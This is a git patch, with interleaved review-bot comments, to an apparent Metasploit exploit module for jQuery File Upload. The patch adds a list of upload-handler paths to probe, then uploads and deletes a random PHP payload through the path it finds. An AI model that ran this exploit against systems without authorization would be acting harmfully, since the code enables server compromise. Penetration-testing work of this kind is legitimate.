From dbc0c802d593930bb2cf809c4e9240fecbcbf800 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Mon, 22 Oct 2018 22:19:10 -0500
Subject: [PATCH] Add detection of additional paths
---
 .../unix/webapp/jquery_file_upload.rb | 43 ++++++++++++++-----
 1 file changed, 32 insertions(+), 11 deletions(-)
diff --git a/modules/exploits/unix/webapp/jquery_file_upload.rb b/modules/exploits/unix/webapp/jquery_file_upload.rb
index 18a7033599..b660498f8f 100644
--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -43,26 +43,47 @@ class MetasploitModule < Msf::Exploit::Remote
 ))
 register_options([
- OptString.new('TARGETURI', [true, 'jQuery File Upload base path', '/'])
+ OptString.new('TARGETURI', [true, 'Base path', '/jQuery-File-Upload'])
 ])
 end
- def check
- res = send_request_cgi(
- 'method' => 'GET',
- 'uri' => normalize_uri(target_uri.path, 'server/php/index.php')
- )
+ # List from PoC
+ def upload_paths
+ %w[
+ /server/php/index.php
+ /server/php/upload.class.php
+ /example/upload.php
+ /server/php/UploadHandler.php
+ /php/index.php
+ ].map { |u| normalize_uri(target_uri.path, u) }
+ end
- if res && res.code == 200
- return CheckCode::Detected
+ def check
+ upload_paths.each do |u|
+ vprint_status("Checking #{u}")
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => u
+ )
+
+ if res && res.code == 200
+ vprint_good("Found #{u}")
+ @u = u
+ return CheckCode::Detected
+ end
 end
 CheckCode::Safe
 end
 def exploit
+ unless check == CheckCode::Detected
+ fail_with(Failure::NotFound, 'Could not find target')
+ end
+
 f = "#{rand_text_alphanumeric(8..42)}.php"
- u = normalize_uri(target_uri.path, "server/php/files/#{f}")
+ u = normalize_uri(File.dirname(@u), 'files', f)
 print_status('Uploading payload')
 res = upload_payload(f)
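Review bot: The rewritten `check` still falls through to `CheckCode::Safe` whenever none of the listed paths answers 200, and that includes the case where `send_request_cgi` returns nil because the host never responded. For anyone reading the check as an assessment result, "Safe" then claims more than was observed: a timeout, or a handler installed under a path not in the list, is reported the same as an unaffected host. I would end the method with `CheckCode::Unknown` unless at least one non-nil response was seen. The `# List from PoC` comment should also say which PoC or advisory the list came from, so the paths can be audited. The body of `exploit` continues past the end of this hunk.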
@@ -88,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
 send_request_cgi(
 'method' => 'POST',
- 'uri' => normalize_uri(target_uri.path, 'server/php/index.php'),
+ 'uri' => @u,
 'ctype' => "multipart/form-data; boundary=#{m.bound}",
 'data' => m.to_s
 )
@@ -104,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
 def delete_payload(f)
 send_request_cgi(
 'method' => 'DELETE',
- 'uri' => normalize_uri(target_uri.path, 'server/php/index.php'),
+ 'uri' => @u,
 'vars_get' => {'file' => f}
 )
 end
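Review bot: The POST request in this hunk and `delete_payload` in the next one now take their URI from `@u`, which is only ever assigned inside `check`, and nothing in either helper documents or enforces that ordering. If one of them runs without a successful `check`, `'uri' => @u` hands nil to `send_request_cgi`. I would rename the variable to something descriptive such as `@upload_uri` and add a comment at the assignment, `# Handler URI found by check; reused by the upload and delete requests`. The `def` enclosing the POST request (presumably `upload_payload`) is outside this hunk, so this rests on the visible call only.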